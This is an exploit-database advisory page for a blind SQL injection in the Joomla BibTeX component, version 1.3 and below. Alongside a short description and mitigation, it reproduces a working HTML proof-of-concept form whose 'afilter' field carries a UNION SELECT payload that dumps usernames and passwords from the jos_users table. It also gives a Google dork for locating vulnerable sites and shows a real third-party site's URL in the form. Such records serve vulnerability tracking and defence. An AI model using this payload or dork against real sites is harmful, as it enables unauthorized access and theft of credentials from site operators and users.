header-logo
Suggest Exploit
vendor:
Joomla Component BibTeX
by:
ajann
7.5
CVSS
HIGH
The Joomla Component BibTeX version 1.3 and below is vulnerable to remote blind SQL injection. An attacker can execute arbitrary SQL queries by manipulating the ‘afilter’ parameter in the ‘adminForm’ form action. This can lead to unauthorized access, data leakage, and potential compromise of the Joomla website.
89
CWE
Product Name: Joomla Component BibTeX
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: NO
Related CWE:
CPE: a:joomla:com_jombib
Metasploit:
Other Scripts:
Platforms Tested:

Joomla Component BibTeX <= 1.3 Remote Blind SQL Injection Vulnerability

The Joomla Component BibTeX version 1.3 and below is vulnerable to remote blind SQL injection. An attacker can execute arbitrary SQL queries by manipulating the 'afilter' parameter in the 'adminForm' form action. This can lead to unauthorized access, data leakage, and potential compromise of the Joomla website.

Mitigation:

Update to a patched version of the Joomla Component BibTeX or apply relevant security patches provided by the vendor.
Source

Exploit-DB raw data:

<html>
<head>
<title>Joomla Component BibTeX <= 1.3 Remote Blind SQL Injection Vulnerability</title>
</head>
<body>

<!-- # Title   :  Joomla Component BibTeX <= 1.3 Remote Blind SQL Injection Vulnerability -->
<!-- # Author  :  ajann -->
<!-- # Contact :  :( -->
<!-- # S.Page  :  http://www.everythingthatiknowabout.com -->
<!-- # $$      :  Free -->
<!-- # Dork    :  inurl:index.php?option=com_jombib -->
<!-- # DorkEx  :  http://www.google.com.tr/search?q=inurl:index.php%3Foption%3Dcom_jombib&hl=tr&start=0&sa=N -->
<!-- # .. -->
<!-- # TURKEY -->

<!-- # Note: Pls Edit [form action=] and Direct Submit // form action example: xx.xx/path/index.php?option=com_jombib-->




<form action="...." method="post" name="adminForm">

				<table>
					<tr>
							<td valign="bottom">
								Autore
								<input type="text" name="afilter" value="abcdefg' union select 111,222,333,444,555,1,1,1,1,1,2,3,4,5,6,1,2,3,4,5,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,4,2,2,2,2,2,0,0,0 from jos_users/*" class="inputbox" onchange="document.adminForm.submit();" size="20" />
							</td>
							<td valign="bottom">
								Titolo
								<input type="text" name="filter" value="" class="inputbox" onchange="document.adminForm.submit();" size="20" />
							</td>

							<td valign="bottom">
								<input type="submit" value="Direct Submit"/>
							</td>
							<td valign="bottom">
								&nbsp;&nbsp;&nbsp;Ordina&nbsp;
<select name="order" class="inputbox" size="1"  onchange="document.adminForm.submit();">
	<option value="ryear" selected="selected">Date desc</option>
	<option value="year">Date asc</option>

	<option value="title">Title asc</option>
	<option value="rtitle">Title desc</option>
	<option value="author">Author asc</option>
	<option value="rauthor">Author desc</option>
	<option value="journal">Journal asc</option>
	<option value="rjournal">Journal desc</option>

	<option value="type">Type</option>
</select>
							</td >
							<td nowrap="nowrap" valign="bottom">
								&nbsp;&nbsp;&nbsp;Mostra&nbsp;
<select name="limit" class="inputbox" size="1" onchange="document.location.href='http://www.gruppofrattura.it/index.php?option=com_jombib&amp;&amp;order=ryear&amp;limit=' + this.options[selectedIndex].value + '&amp;limitstart=0';">
	<option value="5">5</option>
	<option value="10">10</option>

	<option value="15">15</option>
	<option value="20">20</option>
	<option value="25">25</option>
	<option value="30">30</option>
	<option value="50" selected="selected">50</option>
</select>
							</td>

					</tr>
				</table>


		<input type="hidden" name="option" value="com_jombib" />
		<input type="hidden" name="catid" value="$catId" />
		</form>

</body>
</html>

# milw0rm.com [2007-08-23]

Navigation

Suggest Exploit

Services By CQR